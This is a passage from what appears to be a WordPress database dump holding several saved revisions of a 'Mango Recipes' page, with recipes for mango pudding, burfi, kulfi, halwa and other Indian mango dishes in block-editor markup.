moulds in between your palm or dip them in a bowl of water.<br>Gently loosen and remove mango kulfi.<br>Garnish with crushed pista. Serve with love.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-halwa-recipe\"><strong>MANGO HALWA RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Preparation Time :15 Mins<br>Cook Time :45 Mints<br>Makes :4-5 Perfect Squares &amp; Some Small Pieces</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients-2\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>2 and 3/4 cups Mango Pulp<br>1 tablespoon Ghee</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructions-1\"><strong>INSTRUCTIONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>In a heavy bottom vessel add the ghee and when it is hot add the mango pulp.<br>Keep stirring the mixture every 10-15 minutes so that it does not stick to the vessel.<br>The mixture will reduce in quantity, there will be a change in color and after 45 minutes transfer this mixture to a greased (with very little ghee) plate. I used 2 and 3/4 cups of pulp and it cooked down to 3/4ths of a cup approximately. So a very small plate is enough.<br>Left the plate undisturbed for one more hour and then cut it into pieces.<br>Garnish it with nuts of your choice.</p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:group -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->','Mango Recipes','','inherit','closed','closed','','745-revision-v1','','','2022-02-07 17:24:37','2022-02-07 11:54:37','',745,'https://mangomitra.in/?p=823',0,'revision','',0),(824,1,'2022-02-07 17:25:48','2022-02-07 11:55:48','<!-- wp:group -->\n<div class=\"wp-block-group\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:heading -->\n<h2 id=\"mango-pudding-recipe\"><strong>MANGO PUDDING RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Preparation Time : 4 hours<br>Cook Time :15 minutes<br>Total Time : 4 hours 15 minutes<br>Servings : 3 Servings</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>1 tsp agar-agar / gelatin / china grass<br>2 tbsp hot water<br>2 cups mango puree<br>for cream layer:<br>1 cup milk full cream<br>1 tsp agar-agar / gelatin<br>½ cup sugar powdered<br>1 cup cream<br>1 tsp vanilla extract / vanilla essence<br>pinch of salt</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructions\"><strong>INSTRUCTIONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Firstly, in a large mixing bowl take 1 tablespoon of agar-agar / gelatin and add 2 tablespoon hot water.   Mix well and dissolve agar-agar completely.<br>Further add 2 cups of mango puree. Mix well making sure the pulp gets mixed up with agar-agar uniformly.<br>Furthermore, place the serving glass in a bowl so that it gets tilted slightly. Pour in prepared mango mixture till it reaches the rim.<br>Now refrigerate it for 2 hours or overnight, till it sets completely. After 2 hours, make sure to check the mango has set completely.<br>Now prepare cream layer by heating up milk.<br>Add in 1 tablespoon agar-agar / gelatin and whisk well.<br>Cook the milk on medium-low heat till it steams (do not boil).<br>Further add 1 cup cream and whisk well. Additionally add ½ cup powdered sugar, 1 tablespoon vanilla extract and pinch of salt. Whisk and dissolve the sugar completely.<br>Let the milk cool for 10 minutes before pouring to the glass.<br>Pour the milk into glass.<br>Refrigerate it for 2 hours or overnight, till it sets completely.<br>Finally, garnish with few chopped mangoes and enjoy mango panna cotta or mango pudding.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:heading -->\n<h2 id=\"mavinakayi-chitranna-recipe\"><strong>MAVINAKAYI CHITRANNA RECIPE </strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph {\"align\":\"left\"} -->\n<p class=\"has-text-align-left\">Mavinakayi Chitranna Recipe is a delicious preparation of rice from the raw green mangoes that you get in the summers. The tartness of the mangoes along with the green chillies and the seasonings, brings out the flavors of this classic South Indian Rice recipe. While you’re probably enjoying the beautifully luscious ripe mangoes of the season, don’t forget to enjoy your share of the raw mangoes too by trying this Mavinakayi Chitranna Recipe. Summer feels incomplete without getting enough of the tangy hit of raw mangoes, balanced by hot spices,salt, lime and the right tempering, raw mangoes are delicious in a range of preparations.Serve the Mavinakayi Chitranna along with a Tomato Onion Cucumber Raita or High-Protein Peanut Chutney and a roasted papad for lunch or even for dinner. The Mavinakayi Chitranna makes a great picnic lunch too.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-rasayana\"><strong>MANGO RASAYANA</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p id=\"mango-rasayana\">Cut the mangoes into small cubes and keep them in a mixing bowl.<br>Squeeze and extract the remaining mango juice from the mangoes.<br>Next add coconut milk, jaggery, and cardamom powder. Mix well. Adjust the consistency of rasayana.<br>Serve chilled with dosa, poori, or chapati.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-seekarna\"><strong>MANGO SEEKARNA</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Seekarane with Holige, Poori, Dosa, chapati, or also can be eaten as it is.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Variations<br>Any variety of mangoes can be used, but try to choose sweet, juicy, and pulpy mangoes.<br>You can use white or brown sugar instead of jaggery. Adjust the jaggery based on the sweetness of the mango. I have made coconut milk at home using freshly shredded coconut but you can also use store brought coconut milk. You can also replace coconut milk with dairy milk or almond milk.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-burfi-recipe\"><strong>MANGO BURFI RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Preparation Time : 5 minutes<br>Cook Time : 15 minutes<br>Total Time : 20 minutes<br>Servings : 24 pieces</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients-1\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>1 cup mango cubes<br>½ cup milk<br>1 cup sugar<br>3 cup coconut grated<br>¼ tablespoon cardamom powder</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructons\"><strong>INSTRUCTONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Firstly, in a blender take 1 cup mango and ½ cup milk.<br>Blend to smooth puree adding more milk if required.<br>Transfer the mango puree to large kadai.<br>Also add 1 cup sugar and mix until sugar dissolves completley.<br>Further add 3 cup coconut keep stirring till the mixture starts to thicken continue to cook on medium flame stirring continuously and after 15 minutes, coconut mixture will start to separate from pan.<br>Now add ¼ tablespoon cardamom powder and mix well.<br>Transfer the prepared mixture into a greased plate lined with baking paper set well forming a block and cut into pieces.<br>Finally, serve mango burfi / mango coconut barfi or store in airtight container for a week in the refrigerator.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-kulfi-recipe\"><strong>MANGO KULFI RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p id=\"mango-kulfi-recipe\">Indian mango kulfi is a instant dessert that is made with condensed milk, mango pulp and cream.<br>For best results follow my detailed step-by-step photo instructions and tips.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients-2\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>1 ½ cup mango pieces, cubed (use sweet mango)(1 medium)<br>½ tin sweetened condensed milk(milkmaid)<br>200 ml whipping cream or 250 ml cream(chilled)<br>1/4 tablespoon elaichi (cardamom powder)<br>1 pinch kesar (saffron) (optional for color)</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructions-1\"><strong>INSTRUCTIONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Soak kesar or saffron in 2 tablespoon hot water. This is optional.<br>Wash and peel mango. Chop them to cubes and add to a blender jar.<br>Add chilled cream, saffron, condensed milk and cardamom powder to the jar.<br>Blend on a medium speed until smooth.<br>Add chopped pistas. Give a good stir.<br>Pour the mixture to the kulfi moulds and refrigerate until set.<br>Rub the moulds in between your palm or dip them in a bowl of water.<br>Gently loosen and remove mango kulfi.<br>Garnish with crushed pista. Serve with love.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-halwa-recipe\"><strong>MANGO HALWA RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Preparation Time :15 Mins<br>Cook Time :45 Mints<br>Makes :4-5 Perfect Squares &amp; Some Small Pieces</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients-2\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>2 and 3/4 cups Mango Pulp<br>1 tablespoon Ghee</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructions-1\"><strong>INSTRUCTIONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>In a heavy bottom vessel add the ghee and when it is hot add the mango pulp.<br>Keep stirring the mixture every 10-15 minutes so that it does not stick to the vessel.<br>The mixture will reduce in quantity, there will be a change in color and after 45 minutes transfer this mixture to a greased (with very little ghee) plate. I used 2 and 3/4 cups of pulp and it cooked down to 3/4ths of a cup approximately. So a very small plate is enough.<br>Left the plate undisturbed for one more hour and then cut it into pieces.<br>Garnish it with nuts of your choice.</p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:group -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->','Mango Recipes','','inherit','closed','closed','','745-revision-v1','','','2022-02-07 17:25:48','2022-02-07 11:55:48','',745,'https://mangomitra.in/?p=824',0,'revision','',0),(825,1,'2022-02-07 17:26:44','2022-02-07 11:56:44','<!-- wp:group -->\n<div class=\"wp-block-group\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:heading -->\n<h2 id=\"mango-pudding-recipe\"><strong>MANGO PUDDING RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Preparation Time : 4 hours<br>Cook Time :15 minutes<br>Total Time : 4 hours 15 minutes<br>Servings : 3 Servings</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>1 tsp agar-agar / gelatin / china grass<br>2 tbsp hot water<br>2 cups mango puree<br>for cream layer:<br>1 cup milk full cream<br>1 tsp agar-agar / gelatin<br>½ cup sugar powdered<br>1 cup cream<br>1 tsp vanilla extract / vanilla essence<br>pinch of salt</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructions\"><strong>INSTRUCTIONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Firstly, in a large mixing bowl take 1 tablespoon of agar-agar / gelatin and add 2 tablespoon hot water.   Mix well and dissolve agar-agar completely.<br>Further add 2 cups of mango puree. Mix well making sure the pulp gets mixed up with agar-agar uniformly.<br>Furthermore, place the serving glass in a bowl so that it gets tilted slightly. Pour in prepared mango mixture till it reaches the rim.<br>Now refrigerate it for 2 hours or overnight, till it sets completely. After 2 hours, make sure to check the mango has set completely.<br>Now prepare cream layer by heating up milk.<br>Add in 1 tablespoon agar-agar / gelatin and whisk well.<br>Cook the milk on medium-low heat till it steams (do not boil).<br>Further add 1 cup cream and whisk well. Additionally add ½ cup powdered sugar, 1 tablespoon vanilla extract and pinch of salt. Whisk and dissolve the sugar completely.<br>Let the milk cool for 10 minutes before pouring to the glass.<br>Pour the milk into glass.<br>Refrigerate it for 2 hours or overnight, till it sets completely.<br>Finally, garnish with few chopped mangoes and enjoy mango panna cotta or mango pudding.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:heading -->\n<h2 id=\"mavinakayi-chitranna-recipe\"><strong>MAVINAKAYI CHITRANNA RECIPE </strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph {\"align\":\"left\"} -->\n<p class=\"has-text-align-left\">Mavinakayi Chitranna Recipe is a delicious preparation of rice from the raw green mangoes that you get in the summers. The tartness of the mangoes along with the green chillies and the seasonings, brings out the flavors of this classic South Indian Rice recipe. While you’re probably enjoying the beautifully luscious ripe mangoes of the season, don’t forget to enjoy your share of the raw mangoes too by trying this Mavinakayi Chitranna Recipe. Summer feels incomplete without getting enough of the tangy hit of raw mangoes, balanced by hot spices,salt, lime and the right tempering, raw mangoes are delicious in a range of preparations.Serve the Mavinakayi Chitranna along with a Tomato Onion Cucumber Raita or High-Protein Peanut Chutney and a roasted papad for lunch or even for dinner. The Mavinakayi Chitranna makes a great picnic lunch too.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-rasayana\"><strong>MANGO RASAYANA</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p id=\"mango-rasayana\">Cut the mangoes into small cubes and keep them in a mixing bowl.<br>Squeeze and extract the remaining mango juice from the mangoes.<br>Next add coconut milk, jaggery, and cardamom powder. Mix well. Adjust the consistency of rasayana.<br>Serve chilled with dosa, poori, or chapati.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-seekarna\"><strong>MANGO SEEKARNA</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Seekarane with Holige, Poori, Dosa, chapati, or also can be eaten as it is.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Variations<br>Any variety of mangoes can be used, but try to choose sweet, juicy, and pulpy mangoes.<br>You can use white or brown sugar instead of jaggery. Adjust the jaggery based on the sweetness of the mango. I have made coconut milk at home using freshly shredded coconut but you can also use store brought coconut milk. You can also replace coconut milk with dairy milk or almond milk.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-burfi-recipe\"><strong>MANGO BURFI RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Preparation Time : 5 minutes<br>Cook Time : 15 minutes<br>Total Time : 20 minutes<br>Servings : 24 pieces</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients-1\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>1 cup mango cubes<br>½ cup milk<br>1 cup sugar<br>3 cup coconut grated<br>¼ tablespoon cardamom powder</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructons\"><strong>INSTRUCTONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Firstly, in a blender take 1 cup mango and ½ cup milk.<br>Blend to smooth puree adding more milk if required.<br>Transfer the mango puree to large kadai.<br>Also add 1 cup sugar and mix until sugar dissolves completley.<br>Further add 3 cup coconut keep stirring till the mixture starts to thicken continue to cook on medium flame stirring continuously and after 15 minutes, coconut mixture will start to separate from pan.<br>Now add ¼ tablespoon cardamom powder and mix well.<br>Transfer the prepared mixture into a greased plate lined with baking paper set well forming a block and cut into pieces.<br>Finally, serve mango burfi / mango coconut barfi or store in airtight container for a week in the refrigerator.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-kulfi-recipe\"><strong>MANGO KULFI RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p id=\"mango-kulfi-recipe\">Indian mango kulfi is a instant dessert that is made with condensed milk, mango pulp and cream.<br>For best results follow my detailed step-by-step photo instructions and tips.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients-2\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>1 ½ cup mango pieces, cubed (use sweet mango)(1 medium)<br>½ tin sweetened condensed milk(milkmaid)<br>200 ml whipping cream or 250 ml cream(chilled)<br>1/4 tablespoon elaichi (cardamom powder)<br>1 pinch kesar (saffron) (optional for color)</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructions-1\"><strong>INSTRUCTIONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Soak kesar or saffron in 2 tablespoon hot water. This is optional.<br>Wash and peel mango. Chop them to cubes and add to a blender jar.<br>Add chilled cream, saffron, condensed milk and cardamom powder to the jar.<br>Blend on a medium speed until smooth.<br>Add chopped pistas. Give a good stir.<br>Pour the mixture to the kulfi moulds and refrigerate until set.<br>Rub the moulds in between your palm or dip them in a bowl of water.<br>Gently loosen and remove mango kulfi.<br>Garnish with crushed pista. Serve with love.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-halwa-recipe\"><strong>MANGO HALWA RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Preparation Time :15 Mins<br>Cook Time :45 Mints<br>Makes :4-5 Perfect Squares &amp; Some Small Pieces</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients-2\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>2 and 3/4 cups Mango Pulp<br>1 tablespoon Ghee</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructions-1\"><strong>INSTRUCTIONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>In a heavy bottom vessel add the ghee and when it is hot add the mango pulp.<br>Keep stirring the mixture every 10-15 minutes so that it does not stick to the vessel.<br>The mixture will reduce in quantity, there will be a change in color and after 45 minutes transfer this mixture to a greased (with very little ghee) plate. I used 2 and 3/4 cups of pulp and it cooked down to 3/4ths of a cup approximately. So a very small plate is enough.<br>Left the plate undisturbed for one more hour and then cut it into pieces.<br>Garnish it with nuts of your choice.</p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:group -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->','Mango Recipes','','inherit','closed','closed','','745-revision-v1','','','2022-02-07 17:26:44','2022-02-07 11:56:44','',745,'https://mangomitra.in/?p=825',0,'revision','',0),(826,1,'2022-02-07 17:28:06','2022-02-07 11:58:06','<!-- wp:group -->\n<div class=\"wp-block-group\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:heading -->\n<h2 id=\"mango-pudding-recipe\"><strong>MANGO PUDDING RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Preparation Time : 4 hours<br>Cook Time :15 minutes<br>Total Time : 4 hours 15 minutes<br>Servings : 3 Servings</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>1 tsp agar-agar / gelatin / china grass<br>2 tsp hot water<br>2 cups mango puree<br>for cream layer:<br>1 cup milk full cream<br>1 tsp agar-agar / gelatin<br>½ cup sugar powdered<br>1 cup cream<br>1 tsp vanilla extract / vanilla essence<br>pinch of salt</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructions\"><strong>INSTRUCTIONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Firstly, in a large mixing bowl take 1 tablespoon of agar-agar / gelatin and add 2 tablespoon hot water.   Mix well and dissolve agar-agar completely.<br>Further add 2 cups of mango puree. Mix well making sure the pulp gets mixed up with agar-agar uniformly.<br>Furthermore, place the serving glass in a bowl so that it gets tilted slightly. Pour in prepared mango mixture till it reaches the rim.<br>Now refrigerate it for 2 hours or overnight, till it sets completely. After 2 hours, make sure to check the mango has set completely.<br>Now prepare cream layer by heating up milk.<br>Add in 1 tablespoon agar-agar / gelatin and whisk well.<br>Cook the milk on medium-low heat till it steams (do not boil).<br>Further add 1 cup cream and whisk well. Additionally add ½ cup powdered sugar, 1 tablespoon vanilla extract and pinch of salt. Whisk and dissolve the sugar completely.<br>Let the milk cool for 10 minutes before pouring to the glass.<br>Pour the milk into glass.<br>Refrigerate it for 2 hours or overnight, till it sets completely.<br>Finally, garnish with few chopped mangoes and enjoy mango panna cotta or mango pudding.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:heading -->\n<h2 id=\"mavinakayi-chitranna-recipe\"><strong>MAVINAKAYI CHITRANNA RECIPE </strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph {\"align\":\"left\"} -->\n<p class=\"has-text-align-left\">Mavinakayi Chitranna Recipe is a delicious preparation of rice from the raw green mangoes that you get in the summers. The tartness of the mangoes along with the green chillies and the seasonings, brings out the flavors of this classic South Indian Rice recipe. While you’re probably enjoying the beautifully luscious ripe mangoes of the season, don’t forget to enjoy your share of the raw mangoes too by trying this Mavinakayi Chitranna Recipe. Summer feels incomplete without getting enough of the tangy hit of raw mangoes, balanced by hot spices,salt, lime and the right tempering, raw mangoes are delicious in a range of preparations.Serve the Mavinakayi Chitranna along with a Tomato Onion Cucumber Raita or High-Protein Peanut Chutney and a roasted papad for lunch or even for dinner. The Mavinakayi Chitranna makes a great picnic lunch too.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-rasayana\"><strong>MANGO RASAYANA</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p id=\"mango-rasayana\">Cut the mangoes into small cubes and keep them in a mixing bowl.<br>Squeeze and extract the remaining mango juice from the mangoes.<br>Next add coconut milk, jaggery, and cardamom powder. Mix well. Adjust the consistency of rasayana.<br>Serve chilled with dosa, poori, or chapati.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-seekarna\"><strong>MANGO SEEKARNA</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Seekarane with Holige, Poori, Dosa, chapati, or also can be eaten as it is.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Variations<br>Any variety of mangoes can be used, but try to choose sweet, juicy, and pulpy mangoes.<br>You can use white or brown sugar instead of jaggery. Adjust the jaggery based on the sweetness of the mango. I have made coconut milk at home using freshly shredded coconut but you can also use store brought coconut milk. You can also replace coconut milk with dairy milk or almond milk.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-burfi-recipe\"><strong>MANGO BURFI RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Preparation Time : 5 minutes<br>Cook Time : 15 minutes<br>Total Time : 20 minutes<br>Servings : 24 pieces</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients-1\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>1 cup mango cubes<br>½ cup milk<br>1 cup sugar<br>3 cup coconut grated<br>¼ tablespoon cardamom powder</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructons\"><strong>INSTRUCTONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Firstly, in a blender take 1 cup mango and ½ cup milk.<br>Blend to smooth puree adding more milk if required.<br>Transfer the mango puree to large kadai.<br>Also add 1 cup sugar and mix until sugar dissolves completley.<br>Further add 3 cup coconut keep stirring till the mixture starts to thicken continue to cook on medium flame stirring continuously and after 15 minutes, coconut mixture will start to separate from pan.<br>Now add ¼ tablespoon cardamom powder and mix well.<br>Transfer the prepared mixture into a greased plate lined with baking paper set well forming a block and cut into pieces.<br>Finally, serve mango burfi / mango coconut barfi or store in airtight container for a week in the refrigerator.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-kulfi-recipe\"><strong>MANGO KULFI RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p id=\"mango-kulfi-recipe\">Indian mango kulfi is a instant dessert that is made with condensed milk, mango pulp and cream.<br>For best results follow my detailed step-by-step photo instructions and tips.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients-2\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>1 ½ cup mango pieces, cubed (use sweet mango)(1 medium)<br>½ tin sweetened condensed milk(milkmaid)<br>200 ml whipping cream or 250 ml cream(chilled)<br>1/4 tablespoon elaichi (cardamom powder)<br>1 pinch kesar (saffron) (optional for color)</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructions-1\"><strong>INSTRUCTIONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Soak kesar or saffron in 2 tablespoon hot water. This is optional.<br>Wash and peel mango. 